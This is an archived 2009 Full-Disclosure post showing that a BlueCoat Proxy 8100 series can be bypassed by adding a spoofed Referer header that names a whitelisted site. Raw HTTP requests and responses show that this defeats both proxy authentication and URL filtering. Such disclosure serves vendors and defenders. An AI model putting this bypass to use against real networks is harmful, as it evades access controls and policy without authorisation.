[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] ByPass a BlueCoat Proxy 8100 Serie authentification
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] ByPass a BlueCoat Proxy 8100 Serie authentification
- From: "antoine@xxxxxxxx" <antoine@xxxxxxxx>
- Date: Fri, 14 Aug 2009 06:10:12 -0700 (PDT)
Title : ByPass a BlueCoat Proxy 8100 Serie (authentification request AND
eventually the 3rd party url filtering solution)
Date : 14/08/2009
Author : Antoine Santo
******************************************************************
Test one : Try to browse http://www.fcnantes.com/
Result : I need an Account
******************************************************************
GET http://www.fcnantes.com/ HTTP/1.1
Host: www.fcnantes.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.20)
Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
-----------------
HTTP/1.1 407 Proxy Authentication Required
Proxy-Authenticate: BASIC realm="ACCES"
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Proxy-Connection: close
Set-Cookie: BCSI-CS-XXX0302B32A48XXX=2; Path=/
Connection: close
Content-Length: 733
<HTML><HEAD>
<TITLE>Authentification needed</TITLE>
</HEAD><BODY></BODY></HTML>
******************************************************************************************
Test two : i just add a spoofed http header REFERER to a whitelisted
(localdatabase) site
Result : W00t !!
******************************************************************************************
GET http://www.fcnantes.com/ HTTP/1.1
Host: www.fcnantes.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.20)
Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Cookie: BCSI-CS-XXX0302B32A48XXX=2
Referer: http://www.mappy.fr
-----------------
HTTP/1.1 200 OK
Date: Fri, 14 Aug 2009 12:41:44 GMT
Server: Apache/2.2.3 (Debian)
Content-Type: text/html
Transfer-Encoding: chunked
Proxy-Connection: Keep-Alive
Connection: Keep-Alive
Age: 0
133f
<HTML>
<HEAD>
<TITLE>fcnantes.com - Site officiel du FC Nantes</TITLE>
<meta name="description" content="Actualit. du Footbal
<....snip....>
</HTML>
***************************************************************************************************
By the way, http://www.fcnantes.com/ is not even allowed by the url filter with
my legal account ;)
***************************************************************************************************
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/